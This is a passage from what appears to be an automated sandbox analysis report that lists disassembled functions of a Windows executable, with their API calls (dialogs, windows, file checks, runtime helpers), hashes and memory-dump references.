Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 3f039b83283ee01333173046e5b690bc8d0c2c3324e5d54173796182b4a7134e
Instruction ID: ee40706708875a23c34fdc33da8ae7d277573f7244bbe7180e5b15a45ce161d5
Opcode Fuzzy Hash: 3f039b83283ee01333173046e5b690bc8d0c2c3324e5d54173796182b4a7134e
Instruction Fuzzy Hash: C0F01231600209EB8B14DFA9DD09DDFBBBCEB49610B50406AB915E3150DE74EE05C761

Function 6C64B931 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(?), ref: 6C64B943
PathIsDirectoryW.SHLWAPI(?), ref: 6C64B94E

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: Path$DirectoryExistsFile
String ID:
API String ID: 1302732169-0
Opcode ID: 994149f79754403f2d78ffaba7126338f4e43cd2cc7eb29afdc7969582b8859f
Instruction ID: 7da8d98474b00b722623256dd7631f44a69b9ddb2ff4f7faf5c1f6240affaf64
Opcode Fuzzy Hash: 994149f79754403f2d78ffaba7126338f4e43cd2cc7eb29afdc7969582b8859f
Instruction Fuzzy Hash: 6AE04F32301A51ABD7119A6ACC48BBF36B8AFCBF94F15D41DF540EA720D714C402C6AD

Function 00AC5894 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000E), ref: 00AC58A9
CreateDialogParamW.USER32(000000CA,?,Function_0001A96B,?), ref: 00AC58DA

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CreateDialogErrorLastParam
String ID:
API String ID: 3445605341-0
Opcode ID: 152790878bdd91b7d7c68a82b77876715af658e475ba4f87963f38382273caa6
Instruction ID: 6920b5917e84e4d444477097714222b2d8d0e371e03707be4e3b5c4eca68ab9d
Opcode Fuzzy Hash: 152790878bdd91b7d7c68a82b77876715af658e475ba4f87963f38382273caa6
Instruction Fuzzy Hash: 1DE0D831655310BFE220BB31DD07F977E65BF28B12F010C79B555A20E0EBA0A400D766

Function 00ACE85C Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000E), ref: 00ACE871
CreateDialogParamW.USER32(000000C9,?,Function_0001A96B,?), ref: 00ACE8A2

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CreateDialogErrorLastParam
String ID:
API String ID: 3445605341-0
Opcode ID: cefb44b02bce383b1c4539d682b471ee7c1b1b8cf2f5449dd5f7bcb91c72b157
Instruction ID: c6b5024538eb572fbcd331e22278551861e941318c553e02702e730af374d3f7
Opcode Fuzzy Hash: cefb44b02bce383b1c4539d682b471ee7c1b1b8cf2f5449dd5f7bcb91c72b157
Instruction Fuzzy Hash: D6E04831295310BFE220BB21DD06F977E65AF28B12F010C79B555B60E0EBA1D415C765

Function 00A8AA43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000E), ref: 00A8AA58
CreateDialogParamW.USER32(00000081,?,Function_0001A96B,?), ref: 00A8AA89

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CreateDialogErrorLastParam
String ID:
API String ID: 3445605341-0
Opcode ID: b24e9446fb5083c74a274095dc9da4ea1bc60faada0a54bc581e41452cbcdb79
Instruction ID: c0f5d8517b91850acff39a6e6899503cf7028df701f12fe3f2fb62874a6d3152
Opcode Fuzzy Hash: b24e9446fb5083c74a274095dc9da4ea1bc60faada0a54bc581e41452cbcdb79
Instruction Fuzzy Hash: B6E0D831554310BFE220BB20DD06FAB7F65BF28B12F004825B555A20E0FBE0D805CB66

Function 00A87FEB Relevance: 3.0, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 00A87FFA
SysAllocString.OLEAUT32(?), ref: 00A88005

Part of subcall function 00A7DFB0: __CxxThrowException@8.LIBCMT ref: 00A7DFC2

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: String$AllocException@8FreeThrow
String ID:
API String ID: 1688122297-0
Opcode ID: 047043b3f84bdb388e9114497f70b1b8e7841ec8afb2b87bff50eba56315152b
Instruction ID: 45135e9496389539377615f9a53c5f89720bf60f95c8cb8cdc2b3276e65db2d3
Opcode Fuzzy Hash: 047043b3f84bdb388e9114497f70b1b8e7841ec8afb2b87bff50eba56315152b
Instruction Fuzzy Hash: 77E086362002119BC3316F2D9804A1AF3F9AF94771B25481FF4D4E3101DFB4C8818B54

Function 00AA67E9 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000005,00B5BC8C,00A8AFA3,?), ref: 00AA67FA
ShowWindow.USER32(?,00000000,00B5BC8C,00A8AFA3,?), ref: 00AA6809

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 372f54e52d1d967e7aa4713a489ee0ef2eaeb9fca8e47d18188d4f264794d1f8
Instruction ID: 6abf8181f0a1b9b4079a0f77ddca27764725da77a9564eff1b44d583e718523d
Opcode Fuzzy Hash: 372f54e52d1d967e7aa4713a489ee0ef2eaeb9fca8e47d18188d4f264794d1f8
Instruction Fuzzy Hash: C8E01A31155600FAE2219B20CC0ABD9B6A5FB29705F58882AB191630E0D7B56841CF45

Function 00AFE9C8 Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00AFE9D4

Part of subcall function 00B04E30: __getptd_noexit.LIBCMT ref: 00B04E33
Part of subcall function 00B04E30: __amsg_exit.LIBCMT ref: 00B04E40

Part of subcall function 00AFE98B: __IsNonwritableInCurrentImage.LIBCMT ref: 00AFE99E
Part of subcall function 00AFE98B: __getptd_noexit.LIBCMT ref: 00AFE9AE
Part of subcall function 00AFE98B: __freeptd.LIBCMT ref: 00AFE9B8
Part of subcall function 00AFE98B: ExitThread.KERNEL32 ref: 00AFE9C1

__XcptFilter.LIBCMT ref: 00AFE9F5

Part of subcall function 00B0AE94: __getptd_noexit.LIBCMT ref: 00B0AE9C

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadXcpt__amsg_exit__freeptd__getptd
String ID:
API String ID: 393088965-0
Opcode ID: 23519beb42b18604eda96f4201d6c8da90da6ada350a124ec8d2c500804a234a
Instruction ID: f226a1f343d8b77af3ef141a1ea5fdc5104399c751af0ff1e5bf43b1062be43e
Opcode Fuzzy Hash: 23519beb42b18604eda96f4201d6c8da90da6ada350a124ec8d2c500804a234a
Instruction Fuzzy Hash: 9CE0BFB55106049FD708ABA0D946E2E7765AF05311F200488F102672B2CA759D419A21

Function 00AA662B Relevance: 3.0, APIs: 2, Instructions: 15timewindowCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,00002711), ref: 00AA663D
PostMessageW.USER32(?,000009DD,00000000,00000000), ref: 00AA664F

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: KillMessagePostTimer
String ID:
API String ID: 3249405171-0
Opcode ID: 6795eecd78af96fe35dcf2c517471c898f319341c8487a62faedcc872a920c18
Instruction ID: 1c4f4962691a15df80291fbce28ab73c0d10c9799c76f6e55960f14644eb977d
Opcode Fuzzy Hash: 6795eecd78af96fe35dcf2c517471c898f319341c8487a62faedcc872a920c18
Instruction Fuzzy Hash: C6D0A931540210BFE7300B24DD0EF827BA8EB24B00F10842BF319B60E0EBB1EC60CA44

Function 00AA6659 Relevance: 3.0, APIs: 2, Instructions: 14windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00AA665F
Shell_NotifyIconW.SHELL32(00000002), ref: 00AA6672

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: IconNotifyShell_VisibleWindow
String ID:
API String ID: 1820326197-0
Opcode ID: 2ce40add671206a216985c46d8ebafc644fc5c3cac26a3b92ee539b1b2f4642b
Instruction ID: 75d7d12d5f840d05a038748d3a3db8364174179e880e74ad540be2ed007de4a0
Opcode Fuzzy Hash: 2ce40add671206a216985c46d8ebafc644fc5c3cac26a3b92ee539b1b2f4642b
Instruction Fuzzy Hash: 14D012329511316BF7202B219D0DBA769ADDF1A751F0A4839686AD71A0EF90CC0185E0

Function 00AFF350 Relevance: 1.6, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

__fileno.LIBCMT ref: 00AFF434

Part of subcall function 00AF98D1: __getptd_noexit.LIBCMT ref: 00AF98D1

Part of subcall function 00AFA5B1: __decode_pointer.LIBCMT ref: 00AFA5BC

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: __decode_pointer__fileno__getptd_noexit
String ID:
API String ID: 4187974367-0
Opcode ID: 41557f5f657fbe65f53c6ac8eba9fce2e22c78e33ec1a32d7e7d4c971ebcceb6
Instruction ID: 9f8b20edca5d5b364a0f7597e926dfa4b094f625ea47dab41fb8fea9aac224e2
Opcode Fuzzy Hash: 41557f5f657fbe65f53c6ac8eba9fce2e22c78e33ec1a32d7e7d4c971ebcceb6
Instruction Fuzzy Hash: 14418371A0060C9FDB249FE989845BFBBB5AF80361B248679F66597540E770DE41CB40

Function 00ABEF1E Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00ABEF25

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 7b3b5c7fa18fe306ea11e8ba105d885eaa233c1f4331debfb892f413629247d7
Instruction ID: 81066513ae0157d78b66b5b033bbc0aa67f91a82d6e77c2979bea1e2a1513fb2
Opcode Fuzzy Hash: 7b3b5c7fa18fe306ea11e8ba105d885eaa233c1f4331debfb892f413629247d7
Instruction Fuzzy Hash: 57318E30A00119ABCF05EFA4D991DFEB7BABF84350B14401AF5169B293DB319A42DB94

Function 00AE44E3 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AE44EA

Part of subcall function 00AE42DE: __EH_prolog3.LIBCMT ref: 00AE42FD
Part of subcall function 00AE42DE: GetDriveTypeW.KERNEL32(?,0000000C), ref: 00AE4327

Part of subcall function 00AE2158: __EH_prolog3.LIBCMT ref: 00AE2177
Part of subcall function 00AE2158: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000038), ref: 00AE21BD
Part of subcall function 00AE2158: _memset.LIBCMT ref: 00AE21DF
Part of subcall function 00AE2158: DeviceIoControl.KERNEL32(?,0004D030,?,00000028,?,00000028,?,00000000), ref: 00AE2236
Part of subcall function 00AE2158: _memset.LIBCMT ref: 00AE226C

Part of subcall function 00AE3BFD: __EH_prolog3_catch.LIBCMT ref: 00AE3C04
Part of subcall function 00AE3BFD: CoCreateInstance.OLE32(00B3C868,00000000,00000001,00B3C798,?,00000038,00AE4568,?,?,?,?,?,0000001C,00ADEAD1,?,?), ref: 00AE3C22
Part of subcall function 00AE3BFD: SysFreeString.OLEAUT32(?), ref: 00AE3C71
Part of subcall function 00AE3BFD: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00AE3C88
Part of subcall function 00AE3BFD: SysFreeString.OLEAUT32(?), ref: 00AE3D26

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3$CreateFreeString_memset$BlanketControlDeviceDriveFileH_prolog3_catchInstanceProxyType
String ID:
API String ID: 3646017727-0
Opcode ID: c70992b54ef92632e97b715ddcd755a0ae354016f7418ab18ef7e9b7a97fd2f3
Instruction ID: 83365fa9eff5ee1bffd792d9ba774f80afc8c41f955253dd2935458f857948a7
Opcode Fuzzy Hash: c70992b54ef92632e97b715ddcd755a0ae354016f7418ab18ef7e9b7a97fd2f3
Instruction Fuzzy Hash: 5E21D972D0015E9B9F11EF96C9818FEB7BDAF48350B144026EA11B7251E7309E45CBA0

Function 00A9EAD4 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,00000000,?), ref: 00A9EB65

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: f19ce434d599c6b3a1ce0aac80749d7080c22966f08a5b2e352b06388df6d396
Instruction ID: 4b7b3ca713468c207750336b6f785b925216d607d0720579486555a5e8b868c1
Opcode Fuzzy Hash: f19ce434d599c6b3a1ce0aac80749d7080c22966f08a5b2e352b06388df6d396
Instruction Fuzzy Hash: 78219A35600709AFCF31CF15C984A9ABBF5EB08310F20891AF84B93662C632ED84CB91

Function 00ABEB31 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00ABEB38

Part of subcall function 00AF5546: _malloc.LIBCMT ref: 00AF5560

Part of subcall function 00ABE1E2: __EH_prolog3.LIBCMT ref: 00ABE1E9

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3$_malloc
String ID:
API String ID: 1683881009-0
Opcode ID: 8df291d44cb8cf0bdcbef2c901050c2b46043ef3990d0f91a4f43e8127a69b9d
Instruction ID: 07adf7da8c9efcec796cd37e8a2d9b16c286ca65bd5678b3749ee036423774d1
Opcode Fuzzy Hash: 8df291d44cb8cf0bdcbef2c901050c2b46043ef3990d0f91a4f43e8127a69b9d
Instruction Fuzzy Hash: 4921A230A01208AFDB11DFA8C655BEDBBB9AF48300F148098FD46AB392CB718E40DB51

Function 00A7E410 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 00A7E080: GetCurrentProcessId.KERNEL32 ref: 00A7E084
Part of subcall function 00A7E080: CreateFileW.KERNEL32 ref: 00A7E0AA

PathFileExistsW.SHLWAPI(?,C8A14FE6,?,00000000,?,?,00000000,00B2D2E0,000000FF,?,00A7B43F,?), ref: 00A7E465

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: File$CreateCurrentExistsPathProcess
String ID:
API String ID: 3040742104-0
Opcode ID: 3121caa5f0387d4e49518fc071cf5cf50e8792e4cdcf0b949347f8f722d69f12
Instruction ID: 09d339c90771fe50830311212673cb2be0108a7002e50cc7413b5bc4e190b428
Opcode Fuzzy Hash: 3121caa5f0387d4e49518fc071cf5cf50e8792e4cdcf0b949347f8f722d69f12
Instruction Fuzzy Hash: E411E972604648ABE710CF55ED01BAAB7E8FB09754F04C5AAFC19D3680DB76A900C6A1

Function 00A7CFB0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00A7CFF8

Part of subcall function 00A7D070: _memcpy_s.LIBCMT ref: 00A7D095

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-0
Opcode ID: 8140b4b05a6dfbfc7074e475a2c5bdfb1bae4509e67bc3ab1c6f2e638c3f845e
Instruction ID: bc765474799f5f0777314aa66d5e91ae3f668ed7edf45121d29dc89d76e84631
Opcode Fuzzy Hash: 8140b4b05a6dfbfc7074e475a2c5bdfb1bae4509e67bc3ab1c6f2e638c3f845e
Instruction Fuzzy Hash: E2113C72201A059FD315DFA8C880D6AB3A9FF893207148A5EE65A8B351EB71ED05CB90

Function 00A7DA70 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00AEF9AF: EnterCriticalSection.KERNEL32(00B5CD40,00000000,?,?,00A7DA81,00000000,?,?,?,?,00A7B6E0,?,00000000,?,?), ref: 00AEF9BC
